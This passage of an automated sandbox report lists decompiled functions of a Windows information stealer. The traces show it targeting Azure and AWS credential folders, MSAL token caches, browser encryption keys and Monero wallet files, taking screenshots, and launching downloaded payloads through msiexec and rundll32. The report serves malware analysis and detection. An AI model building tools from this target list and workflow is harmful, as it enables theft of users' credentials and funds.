                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: 2dd9791825e297c57cf215c3e298864dd624330c96a9915c530b51110523dc13
                        • Instruction ID: d856974c900cfec526e071a2fd03d8640879c0fa33bc59599f896c15d59340a3
                        • Opcode Fuzzy Hash: 2dd9791825e297c57cf215c3e298864dd624330c96a9915c530b51110523dc13
                        • Instruction Fuzzy Hash: 12E114B190010DABDB18EBA0DC95FFE7B78BF54340F008169F20A67195DF746A4ACB66
                        Function 005F8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • RegOpenKeyExA.ADVAPI32(00000000,0115B308,00000000,00020019,00000000,006005B6), ref: 005F83A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 005F8426
                        • wsprintfA.USER32 ref: 005F8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 005F847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 005F848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 005F8499
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: cf906e63bd94cc0afca00f28277960b54efed722cbf38a7c7bf0c15134771ff5
                        • Instruction ID: 5dc0686b5eb1a2313a51c5a67f0e411fa1669b0c0862bbdb41304d98c4ac14ac
                        • Opcode Fuzzy Hash: cf906e63bd94cc0afca00f28277960b54efed722cbf38a7c7bf0c15134771ff5
                        • Instruction Fuzzy Hash: 6B811CB191011DABDB28DB50CD95FFA7BB8FF48700F008699E209A6190DF756B86CF91
                        Function 005F4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005F8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 005F4DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 005F4DCD
                          • Part of subcall function 005F4910: wsprintfA.USER32 ref: 005F492C
                          • Part of subcall function 005F4910: FindFirstFileA.KERNEL32(?,?), ref: 005F4943
                        • lstrcat.KERNEL32(?,00000000), ref: 005F4E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 005F4E59
                          • Part of subcall function 005F4910: StrCmpCA.SHLWAPI(?,00600FDC), ref: 005F4971
                          • Part of subcall function 005F4910: StrCmpCA.SHLWAPI(?,00600FE0), ref: 005F4987
                          • Part of subcall function 005F4910: FindNextFileA.KERNEL32(000000FF,?), ref: 005F4B7D
                          • Part of subcall function 005F4910: FindClose.KERNEL32(000000FF), ref: 005F4B92
                        • lstrcat.KERNEL32(?,00000000), ref: 005F4EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 005F4EE5
                          • Part of subcall function 005F4910: wsprintfA.USER32 ref: 005F49B0
                          • Part of subcall function 005F4910: StrCmpCA.SHLWAPI(?,006008D2), ref: 005F49C5
                          • Part of subcall function 005F4910: wsprintfA.USER32 ref: 005F49E2
                          • Part of subcall function 005F4910: PathMatchSpecA.SHLWAPI(?,?), ref: 005F4A1E
                          • Part of subcall function 005F4910: lstrcat.KERNEL32(?,0115E838), ref: 005F4A4A
                          • Part of subcall function 005F4910: lstrcat.KERNEL32(?,00600FF8), ref: 005F4A5C
                          • Part of subcall function 005F4910: lstrcat.KERNEL32(?,?), ref: 005F4A70
                          • Part of subcall function 005F4910: lstrcat.KERNEL32(?,00600FFC), ref: 005F4A82
                          • Part of subcall function 005F4910: lstrcat.KERNEL32(?,?), ref: 005F4A96
                          • Part of subcall function 005F4910: CopyFileA.KERNEL32(?,?,00000001), ref: 005F4AAC
                          • Part of subcall function 005F4910: DeleteFileA.KERNEL32(?), ref: 005F4B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 7f33dce7bbc755beaec6d9a9238ceea26f4f550e659cfe03d35b4785c65626b3
                        • Instruction ID: 98e55332f6b9922c5e698243c2e5c045676f1dc90110eae10d06bbc722bf13fa
                        • Opcode Fuzzy Hash: 7f33dce7bbc755beaec6d9a9238ceea26f4f550e659cfe03d35b4785c65626b3
                        • Instruction Fuzzy Hash: 2C4176B9A4020867DB18F760DC4BFEE7739BB65704F004454B68A560C1EEB45BC98B93
                        Function 005F9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                        Download Yara Rule
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 005F906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: 3fed43ddb3e460c2faaa9e97400c63e68011f260495b43ec936148eac92b591d
                        • Instruction ID: c07430c9261cc9b0ee54fa8931a8a47b2a663f37802cd39fa1d08982690ef35f
                        • Opcode Fuzzy Hash: 3fed43ddb3e460c2faaa9e97400c63e68011f260495b43ec936148eac92b591d
                        • Instruction Fuzzy Hash: 7571F075910209AFDB18DFE4DC89FEEBBB9BF48700F108518F655A7290DB34A905CB61
                        Function 005F2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005F31C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005F335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005F34EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: 8c10c894325d05864851c90d25347160e79a24660169f4d00449646d23f4854b
                        • Instruction ID: 9dbc6d22e37d93d5588ae2c788cc2cdb729196b8569031053a9826d86bc7970b
                        • Opcode Fuzzy Hash: 8c10c894325d05864851c90d25347160e79a24660169f4d00449646d23f4854b
                        • Instruction Fuzzy Hash: D31212B180010E9ADB19EB90CD56FFE7B78BF94340F504159E60A66095EF782B4ACF53
                        Function 005F52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E6280: InternetOpenA.WININET(00600DFE,00000001,00000000,00000000,00000000), ref: 005E62E1
                          • Part of subcall function 005E6280: StrCmpCA.SHLWAPI(?,0115E7B8), ref: 005E6303
                          • Part of subcall function 005E6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005E6335
                          • Part of subcall function 005E6280: HttpOpenRequestA.WININET(00000000,GET,?,0115E3F8,00000000,00000000,00400100,00000000), ref: 005E6385
                          • Part of subcall function 005E6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005E63BF
                          • Part of subcall function 005E6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005E63D1
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005F5318
                        • lstrlen.KERNEL32(00000000), ref: 005F532F
                          • Part of subcall function 005F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005F8E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 005F5364
                        • lstrlen.KERNEL32(00000000), ref: 005F5383
                        • lstrlen.KERNEL32(00000000), ref: 005F53AE
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: eb01ecdbfe47fac84ca978180d2437e3f4bbf999b21aedbd8377e80794cf64a5
                        • Instruction ID: 95cbbc0091ebddb94ddf92c4e2ab6a0a955ff1eeb31d325124cf695b4d944588
                        • Opcode Fuzzy Hash: eb01ecdbfe47fac84ca978180d2437e3f4bbf999b21aedbd8377e80794cf64a5
                        • Instruction Fuzzy Hash: A9512EB091014E9BCB18FF60C99AAFD7B79BF90340F508014E64A5B591EF786B46CB53
                        Function 005F12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 52e4aa62923cac71e2272e2178cb820a8374504067aab57745f52bdc4d2b1284
                        • Instruction ID: 1ab3ba209fd386d0d063b2eca026ff3ed7b61ca2c4a6af7656f67937f8623b1b
                        • Opcode Fuzzy Hash: 52e4aa62923cac71e2272e2178cb820a8374504067aab57745f52bdc4d2b1284
                        • Instruction Fuzzy Hash: 0DC164B590011D9BCB18EF60DC8DFFA7B79BF94304F104598E60AA7241EA74AA85CF91
                        Function 005F4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005F8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 005F42EC
                        • lstrcat.KERNEL32(?,0115DF90), ref: 005F430B
                        • lstrcat.KERNEL32(?,?), ref: 005F431F
                        • lstrcat.KERNEL32(?,0115D560), ref: 005F4333
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005F8D90: GetFileAttributesA.KERNEL32(00000000,?,005E1B54,?,?,0060564C,?,?,00600E1F), ref: 005F8D9F
                          • Part of subcall function 005E9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 005E9D39
                          • Part of subcall function 005E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005E99EC
                          • Part of subcall function 005E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005E9A11
                          • Part of subcall function 005E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005E9A31
                          • Part of subcall function 005E99C0: ReadFile.KERNEL32(000000FF,?,00000000,005E148F,00000000), ref: 005E9A5A
                          • Part of subcall function 005E99C0: LocalFree.KERNEL32(005E148F), ref: 005E9A90
                          • Part of subcall function 005E99C0: CloseHandle.KERNEL32(000000FF), ref: 005E9A9A
                          • Part of subcall function 005F93C0: GlobalAlloc.KERNEL32(00000000,005F43DD,005F43DD), ref: 005F93D3
                        • StrStrA.SHLWAPI(?,0115DE88), ref: 005F43F3
                        • GlobalFree.KERNEL32(?), ref: 005F4512
                          • Part of subcall function 005E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N^,00000000,00000000), ref: 005E9AEF
                          • Part of subcall function 005E9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,005E4EEE,00000000,?), ref: 005E9B01
                          • Part of subcall function 005E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N^,00000000,00000000), ref: 005E9B2A
                          • Part of subcall function 005E9AC0: LocalFree.KERNEL32(?,?,?,?,005E4EEE,00000000,?), ref: 005E9B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 005F44A3
                        • StrCmpCA.SHLWAPI(?,006008D1), ref: 005F44C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005F44D2
                        • lstrcat.KERNEL32(00000000,?), ref: 005F44E5
                        • lstrcat.KERNEL32(00000000,00600FB8), ref: 005F44F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: a8481607dbe0ecaabc4f3b287284231ef0d3728fd0c804a43ee7556120450511
                        • Instruction ID: 927f1ba9738e41fa4b9ad5895fd691812cbe48ad9210cb6d8ee537d74e4a8292
                        • Opcode Fuzzy Hash: a8481607dbe0ecaabc4f3b287284231ef0d3728fd0c804a43ee7556120450511
                        • Instruction Fuzzy Hash: 697115B6900209ABDB14EBA0DC89FFE7779BF88300F048598F60597181DA75DB45CF92
                        Function 005E1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005E12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005E12B4
                          • Part of subcall function 005E12A0: RtlAllocateHeap.NTDLL(00000000), ref: 005E12BB
                          • Part of subcall function 005E12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005E12D7
                          • Part of subcall function 005E12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005E12F5
                          • Part of subcall function 005E12A0: RegCloseKey.ADVAPI32(?), ref: 005E12FF
                        • lstrcat.KERNEL32(?,00000000), ref: 005E134F
                        • lstrlen.KERNEL32(?), ref: 005E135C
                        • lstrcat.KERNEL32(?,.keys), ref: 005E1377
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005F8B60: GetSystemTime.KERNEL32(00600E1A,0115A8D0,006005AE,?,?,005E13F9,?,0000001A,00600E1A,00000000,?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005F8B86
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 005E1465
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005E99EC
                          • Part of subcall function 005E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005E9A11
                          • Part of subcall function 005E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005E9A31
                          • Part of subcall function 005E99C0: ReadFile.KERNEL32(000000FF,?,00000000,005E148F,00000000), ref: 005E9A5A
                          • Part of subcall function 005E99C0: LocalFree.KERNEL32(005E148F), ref: 005E9A90
